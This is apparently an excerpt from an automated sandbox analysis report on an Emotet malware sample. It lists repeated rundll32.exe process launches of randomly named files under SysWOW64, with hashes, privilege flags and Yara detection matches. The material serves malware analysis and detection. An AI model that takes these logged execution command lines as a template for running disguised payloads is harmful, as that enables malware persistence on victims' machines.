                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:45
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:46
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:47
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:47
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:49
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:00:09:50
                                          Start date:27/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
                                          Imagebase:0x400000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Disassembly

                                          Code Analysis

                                          Reset < >